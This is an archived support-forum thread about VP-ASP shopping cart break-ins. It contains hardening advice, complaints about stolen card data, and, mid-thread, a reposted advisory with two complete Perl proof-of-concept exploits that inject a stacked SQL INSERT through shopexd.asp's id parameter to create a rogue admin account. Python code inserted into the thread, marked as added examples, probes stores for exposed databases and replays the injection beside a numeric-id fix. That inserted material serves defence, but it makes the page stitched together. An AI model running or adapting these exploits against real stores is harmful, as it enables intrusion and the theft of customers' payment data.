Uneeeq
Starting Member
1 Posts
Posted - February 06 2003 : 10:42:19
Hi all,
I do not have a store, but thought that those who do might want to be aware. This is from a list post this morning:
QUOTE: I recently intercepted an email from an Indonesian guy.
That email contained a whole list of online shops (URLs) that use the VP-ASP Shopping cart software (see http://www.vpasp.com).
For all the shops mentioned in that list they had the correct admin password and login name. This means that shopping cart software is extremely vulnerable to hacking! It seems easy to download the databases from such a shopping cart system, which include all customer info, credit card numbers and so on...
If you are using this software I suggest you secure it immediately, because they are watching you!
UNQUOTE
I was not even aware of this shopping cart software, there are so many out there... but for what it's worth, I figured I would post this so you all can secure your databases. CHANGE YOUR PASSWORDS!
Best Regards,
Genie Livingstone
Cam
VP-CART Super User
Australia
361 Posts
Posted - February 06 2003 : 16:21:28
Thanks Uneeeq,
VPASP is vulnerable if 3 things are not done, and a lot of carts are in this situation. The same goes for our YourVirtualStore customers.
Firstly, if the shopdbtest.asp and the shopa_sessionlist.asp pages are not either deleted or renamed, a hacker can use them to discover the location of your database.
Secondly, if you do not change your username and password from the default VPASP ones, hackers can simply waltz into your store.
Thirdly, the database that comes with VPASP is not in a secure directory. This needs to be done. Your host can set up a folder that is either "off-web", and inaccessible to web browsers, or protect a folder that is part of your web site so that HTTP access is blocked.
If this is not done the hacker can simply insert the path to the db and download at his leisure.
These points are in the help notes and should be followed immediately, before your site goes live.
It has also been mentioned in numerous posts as well.
Protect yourself!!!
Cheers, Cam
*************************************
Cam Flanigan
YourVirtualStore Sales
e-mail: http://www.vpasp.com/sales/shopcustcontact.asp
web: http://www.yourvirtualstore.net
Build your own YourVirtualStore!!! www.yourvirtualstore.net
*************************************
Cam
VP-CART Super User
Australia
361 Posts
Posted - February 10 2004 : 09:15:02
This was a post I made a year ago.
A few changes to make it relevant.
The new pages to delete are:
diag_dbtest.asp
diag_sessionlist.asp
any file starting with covert_
Make sure you place your db in a secure folder that is set up by your web host. You can test this by inserting the name of your db into the browser address bar. If you can download your database then it isn't secure.
For example:
http://www.yoursite.com/database/shopping500.mdb
Change the above to match your database location.
Change your shoplogin.asp name to something unique.
Update your Administration Security to accept the new name.
Change the xshopid setting in shop$config.asp to something unique to your site.
Set xshowadmin to NO in the admin so if hackers insert shopadmin1.asp into the address bar they are simply returned to the default page rather than the admin login page.
Read and implement all VPASP security notices.
Just had a number of our customers let us know that they have been having unwelcome visitors so thought it timely to repost this basic information.
Cheers, Cam
*************************************
Cam Flanigan
YourVirtualStore Sales
e-mail: http://www.vpasp.com/sales/shopcustcontact.asp
web: http://www.yourvirtualstore.net
Build your own YourVirtualStore!!! www.yourvirtualstore.net
*************************************
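Added example, not part of Cam's posts and not VP-ASP or YourVirtualStore code: a small Python probe for the exposures the two checklists above describe (the diagnostic pages that should be deleted, a database that can be downloaded over HTTP, and the default admin entry points that should no longer show a login form once shoplogin.asp is renamed and xshowadmin is NO). It takes a fetch() callable, so the demo runs offline against constructed responses; the store URLs, the sample responses and the default database path are made up for the demo, and a served .mdb is recognised by the "Standard Jet DB" header that Access files begin with.

```python
"""Probe a VP-ASP store for the exposures listed in the posts above.

Added example, not VP-ASP code. fetch(url) must return
(status_code, headers_dict, body_bytes); plug in urllib or requests to
run it against a real store. The demo below uses constructed responses.
"""
from urllib.parse import urljoin

# Pages the posts say to delete or rename. Files starting with "covert_"
# are also listed, but no full names are given, so they are not probed.
DIAG_PAGES = ("shopdbtest.asp", "shopa_sessionlist.asp",
              "diag_dbtest.asp", "diag_sessionlist.asp")
# Default admin entry points named in the thread.
ADMIN_PAGES = ("shopadmin1.asp", "shoplogin.asp")
# Access (.mdb) files start with a header containing this string.
JET_SIGNATURE = b"Standard Jet DB"


def probe(fetch, base_url, db_path="database/shopping500.mdb"):
    """Return {finding: advice} for one store.

    db_path defaults to the example path from the post; change it to your
    own database location before running against a real site.
    """
    findings = {}
    for page in DIAG_PAGES:
        status, _, _ = fetch(urljoin(base_url, page))
        if status == 200:
            findings[page] = "diagnostic page reachable: delete or rename it"

    # The test the post describes: can the database itself be downloaded?
    status, headers, body = fetch(urljoin(base_url, db_path))
    ctype = headers.get("content-type", "").lower()
    if status == 200 and (JET_SIGNATURE in body[:64] or not ctype.startswith("text/")):
        findings["database"] = (f"{db_path} is downloadable over HTTP: move it "
                                "off-web or block HTTP access to its folder")

    # With xshowadmin=NO and a renamed login page these must not show a login form.
    for page in ADMIN_PAGES:
        status, _, body = fetch(urljoin(base_url, page))
        if status == 200 and b"password" in body.lower():
            findings[page] = ("admin login reachable at the default name: rename "
                              "shoplogin.asp and set xshowadmin to NO")
    return findings


def make_fake_fetch(responses):
    """Build an offline fetch() from a {url: (status, headers, body)} map (constructed)."""
    def fetch(url):
        return responses.get(url, (404, {"content-type": "text/html"}, b"Not Found"))
    return fetch


# Constructed sample stores, not real sites.
EXPOSED = "http://store.example/"
HARDENED = "http://safe.example/"
SAMPLE_RESPONSES = {
    EXPOSED + "diag_dbtest.asp": (200, {"content-type": "text/html"}, b"<html>DSN=..."),
    EXPOSED + "database/shopping500.mdb": (200, {"content-type": "application/octet-stream"},
                                           b"\x00\x01\x00\x00Standard Jet DB\x00"),
    EXPOSED + "shopadmin1.asp": (200, {"content-type": "text/html"},
                                 b"<form><input type=password></form>"),
    # xshowadmin=NO: the default page comes back instead of the login form.
    HARDENED + "shopadmin1.asp": (200, {"content-type": "text/html"},
                                  b"<html>Welcome to the store</html>"),
}


def run_demo():
    """Probe both constructed stores; returns (exposed_findings, hardened_findings)."""
    fetch = make_fake_fetch(SAMPLE_RESPONSES)
    return probe(fetch, EXPOSED), probe(fetch, HARDENED)


if __name__ == "__main__":
    for site, result in zip((EXPOSED, HARDENED), run_demo()):
        print(site, result or "no exposures found")
```

Against a live store, only the database download check is destructive in the sense of fetching the whole file; the rest are single GETs, so it is safe to run against your own site before going live, which is when the post says these steps belong.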
ljr0
Starting Member
4 Posts
Posted - February 19 2004 : 19:57:25
I hate to say it, but shopexd.asp is wide open. It's so easy to give yourself admin access to the database or run any SQL insertion code from this page that it is almost pathetic.
I'm glad I put in your 2-password security. After doing everything you recommended, I still got hacked. I'm very concerned about the security of this software. We have had several sets of credit card information stolen, and even after applying your patches I'm still getting hacked.
Please quit pretending it's not there and fix it.
support
Administrator
4679 Posts
ljr0
Starting Member
4 Posts
Posted - February 20 2004 : 09:03:12
If you don't know about this one, then I'm not sure that sending you how I "think" there is a hole would do any good.
I did a search on Google about hacking and vp-asp. I came up with a nice list of big open holes. One company out there even shows exactly how to exploit your shopping software.
It wouldn't take a rocket scientist to figure out how to further exploit that hole. If you don't know about the obvious ones and you want me to "show" you what everyone BUT you knows about, then why bother? It almost seems painfully obvious you don't want to know about it.
By the way, the company listing your open door also said they notified you about the problem and got no response. What does that say about your interest in fixing up the security??
siraj
VP-CART New User
USA
194 Posts
Posted - February 20 2004 : 13:59:29
Hi ljr0, I don't know whether you are trying to help or hack. If you really are a VP-ASP user and know the holes in the software, you can post the solutions or problem, or email support. They will, of course, take care of that. If you are just browsing Google to find how to hack VP-ASP, and alerting the rest of the users to be paranoid, what is the use of it and what is your point? GOOD LUCK. SJ.
[email protected]
ljr0
Starting Member
4 Posts
Posted - February 20 2004 : 16:35:58
Why should I send my little info to support if they can't take the time to find out for themselves where the holes are? The fact that someone has already told them where the hole is (and the hole is still there), is sufficient reason for me to raise concerns that the developers of this software either don't care or don't know how to figure it out.
If I'm paying for a product, then they should have the resources to find these things and get them fixed. But maybe you don't agree with that.
I'll send the code clip that has the open hole. But I doubt I will ever hear from them on how to fix the problem even though I'm a customer. That really torques me off too.
siraj
VP-CART New User
USA
194 Posts
Posted - February 20 2004 : 20:43:01
|
ljr0, I did not mean to say I don't agree with you. If there are holes, of course, they need fixing. My point is, we can help them find out sooner by providing the sources. The more you wait, the more risk we take. You can be generous enough to send the code or point out where the problem is; then I hope the VP-ASP users will appreciate you, even if the vendors do not. Hope you will understand. GOOD LUCK. SJ.
[email protected]
entropy4zo
Starting Member
3 Posts
Posted - February 24 2004 : 00:42:33
F*** it, here's the whole thing.

Exploits/POC:

by Bosen
--------
#!/usr/bin/perl -w
$pamer = "
1ndonesian Security Team (1st)
==============================
tio-fux.pl, vpasp SQL Injection Proof of Concept Exploit
by : Bosen & TioEuy
Discover by : TioEuy, AresU
Greetz to : AresU, syzwz (ta for da ipod), TioEuy, sakitjiwa, muthafuka all
#hackers\@centrin.net.id/austnet.org
http://bosen.net/releases/
"; # shut up ! we're the best in our country :)

use LWP::UserAgent;   # LWP Mode sorry im lazy :)
use HTTP::Request;
use HTTP::Response;
$| = 1;
print $pamer;
if ($#ARGV < 3) {
    print "\n Usage: perl tio-fux.pl <uri> <prod-id> <user> <password> \n\n";
    exit;
}
# value written into fldaccess for the new account
my $biji = "1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29";
# a valid product id, then a stacked INSERT into the admin table, then a
# comment to swallow whatever the page appends after the id
$tio  = "$ARGV[0]/shopexd.asp?id=$ARGV[1]";
$tio .= ";insert into tbluser (\"fldusername\",\"fldpassword\",\"fldaccess\") ";
$tio .= "values ('$ARGV[2]','$ARGV[3]','$biji')--";

my $bosen  = LWP::UserAgent->new();
my $gembel = HTTP::Request->new(GET => $tio);
my $dodol  = $bosen->request($gembel);
if ($dodol->is_error()) {
    printf " %s\n", $dodol->status_line;
} else {
    print "Tuing !\n";
}
print "\n680165\n";
--END--

by Aresu
--------
#!/usr/bin/perl
# PRIVATE***PRIVATE***PRIVATE***PRIVATE***PRIVATE***PRIVATE***PRIVATE
# 1ndonesian Security Team (1st)
# ==============================
# VP-ASP Shopping Cart - Exploit
# Discover by : TioEuy & AresU;
# Greetz to: syzwz (ta for da ipod), Bosen, sakitjiwa, muthafuka all
# [email protected]/austnet.org, #[email protected]
# http://bosen.net/releases/
use Socket;

$dodolbasik = "tioeuy.pl, VPASP exploit by TioEuy&AresU ";
# value written into fldaccess for the new account
$aksesnya = "1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29";
$pieldnya = '"fldusername","fldpassword","fldaccess"';

if ($#ARGV < 4) {
    print "\n$dodolbasik";
    print "\n\n Usage: perl tioeuy.pl <server> <full path> <id> <user> <password> \n\n";
    exit;
}
# same stacked INSERT as tio-fux.pl, sent as a raw HTTP/1.0 request
$kupret = "$ARGV[1]shopexd.asp?id=$ARGV[2];insert into tbluser ($pieldnya) values ('$ARGV[3]','$ARGV[4]','$aksesnya')--";
$kupret =~ s/\ /%20/g;
$kupret  = "GET $kupret HTTP/1.0\r\nHost: $ARGV[0]\r\n\r\n";
print $kupret;

$port   = 80;
$host   = $ARGV[0];
$target = inet_aton($host);
@hasil  = sendraw($kupret);
print $gembel;
print @hasil;

# ------------- Sendraw - thanx RFP [email protected]
sub sendraw {
    # this saves the whole transaction anyway
    my ($pstr) = @_;
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) || die("Socket problems\n");
    if (connect(S, pack "SnA4x8", 2, $port, $target)) {
        my @in;
        select(S);
        $| = 1;
        print $pstr;
        while (<S>) { push @in, $_; }
        select(STDOUT);
        close(S);
        return @in;
    }
}
--END--

Vendor Response: Contacted. No response.
Recommendation: No recommendation for this.
1ndonesian Security Team (1st) Advisory: http://bosen.net/releases/
About 1ndonesian Security Team: 1ndonesian Security Team, research and develop intelligent, advanced application security assessment. Based in Indonesia, 1ndonesian Security Team offers best of breed security consulting services, specialising in application, host and network security assessments.
1st provides security information and patches for use by the entire 1st community.
This information is provided freely to all interested parties and may be redistributed provided that it is not altered in any way, 1st is appropriately credited and the document retains.
Greetz to: Bosen, sakitjiwa, muthafuka, alphacentury, Gembul, syzwz, Heltz, TomIngShUu, riico, w4n, negative All 1ndonesian Security Team - #[email protected]/centrin.net.id
AresU <[email protected]>
======================
Original document can be found at http://www.bosen.net/releases/?id=41
GTM
VP-CART New User
USA
122 Posts

jsbeads
Starting Member
USA
39 Posts
Posted - March 02 2004 : 08:58:37
That's easy: just test to see if the ID is numeric. Just like the fixes say.
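Added example, not VP-ASP's code and not from the advisory or any post in this thread: the shopexd.asp id injection the two Perl scripts above build, replayed against an in-memory SQLite database, beside the numeric-id check jsbeads refers to. The tbluser table and its column names are taken from the exploit; the "products" table, its "catalogid" column and the sample row are assumed for the demo, and SQLite's executescript() stands in for a database backend that accepts stacked statements in one request, which is what the exploit relies on.

```python
"""Vulnerable vs. hardened handling of the shopexd.asp id parameter.

Added example, not VP-ASP code. Table "products" / column "catalogid" are
assumed; tbluser and its columns come from the published exploit.
"""
import re
import sqlite3

# Value the exploits write into fldaccess (1..29, comma separated).
ACCESS = ",".join(str(n) for n in range(1, 30))
# The id both scripts send: a valid id, a stacked INSERT, and a trailing
# comment to swallow whatever the page appends after the id.
PAYLOAD = ('1;insert into tbluser ("fldusername","fldpassword","fldaccess") '
           f"values ('evil','evil','{ACCESS}')--")

# A product id is a plain positive integer; anything else is rejected.
ID_RE = re.compile(r"[0-9]{1,9}")


def fresh_db():
    """Constructed minimal schema: one product, no admin accounts yet."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table products(catalogid integer primary key, cname text);
        create table tbluser(fldusername text, fldpassword text, fldaccess text);
        insert into products values (1, 'Widget');
    """)
    return db


def admin_accounts(db):
    """Usernames currently in the admin table."""
    return [row[0] for row in db.execute("select fldusername from tbluser")]


def vulnerable_lookup(db, product_id):
    """Builds the query by string concatenation, the pattern the advisory exploits.

    executescript() runs every statement in the string, so the INSERT after
    the ';' executes exactly as it would on a backend allowing stacked queries.
    """
    sql = "select cname from products where catalogid=" + product_id
    db.executescript(sql)


def safe_lookup(db, product_id):
    """The fix: reject anything that is not a plain number, then bind the value."""
    if not ID_RE.fullmatch(product_id):
        raise ValueError("id must be numeric")
    row = db.execute("select cname from products where catalogid=?",
                     (int(product_id),)).fetchone()
    return row[0] if row else None


def run_demo():
    """Returns (accounts the injection created, payload rejected?, normal lookup)."""
    db = fresh_db()
    vulnerable_lookup(db, PAYLOAD)
    created = admin_accounts(db)

    db = fresh_db()
    try:
        safe_lookup(db, PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    return created, rejected, safe_lookup(db, "1")


if __name__ == "__main__":
    created, rejected, name = run_demo()
    print("accounts after injection:", created)
    print("payload rejected by numeric check:", rejected)
    print("normal lookup:", name)
```

The numeric check alone is what the posted fixes describe and it stops this payload; binding the value as a parameter is the second half, so that a later change to the page cannot reintroduce concatenation by accident.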
ProductivePC
VP-CART New User
USA
199 Posts
Posted - March 29 2004 : 14:56:38
ljr0,
It is very obvious that you are not a programmer and do not understand security issues. What operating system do you use for your computer? Windows? Do you know how many security issues there are with that? How many loopholes. The people at VPASP have taken great pains to make sure that every REPORTED security flaw is taken care of right away. Let Microslop tell you that.
Whenever you program something there are ALWAYS bugs in the programming. You work through those bugs and fix them as they come about. That is what is called a debugging process. To expect that a programmer will know all aspects of every security flaw for every type of language that can be used to implement one is ludicrous and unreasonable.
This is why every program out there depends on people to find them and turn them in, in order to fix them. Your AOL version that you are using to sign onto the Internet with right now.... it too has flaws and damages the Microslop OS registry and can be hacked easier than eating apple pie; however, AOL depends on you reporting that to them in order to fix it.
Same thing with MS OS. Same thing with Linux bugs. Same thing with almost any piece of software out there. At least VPASP is willing to hear your request and fix it..... you should be thankful for that. Most of the other shopping carts wouldn't even go that far. They would consider you just a fly on the wall and not even want to speak to or hear from you because you are not as intelligent as them (in their mind). Fortunately enough, VPASP developers are not like that.
As for contacting the people. EVERY e-mail, without fail, that I have ever sent to VPASP has been returned by a person with a personalized thank you note and not by an auto responder. I consider that phenomenal service! How easy is it for me to say I sent an e-mail to ljr0 and I did not get a return. Hey look guys, I wrote it in a forum post... it must be true! Here let me write it again. I sent an e-mail to ljr0 talking about this post and have not gotten a return therefore he must not be interested in responding or fixing his posts. We see how far that goes!
However, instead of making the problem worse you could have saved us all the aggravation and time and just let them know off the bat what the security loophole was that YOU were concerned about. At the point in time that you refused to mention it, you were no longer part of the solution; you became part of the problem!
Well, that is my two cents. Sorry if that is a little rough for your forums Howard; however I have seen the pains you all have taken to get this cart where it needs to be and I have seen the many posts help many people and I have seen the security fixes work.
Wayne www.WorldFamousGiftBaskets.net
Edited by - ProductivePC on March 29 2004 14:59:58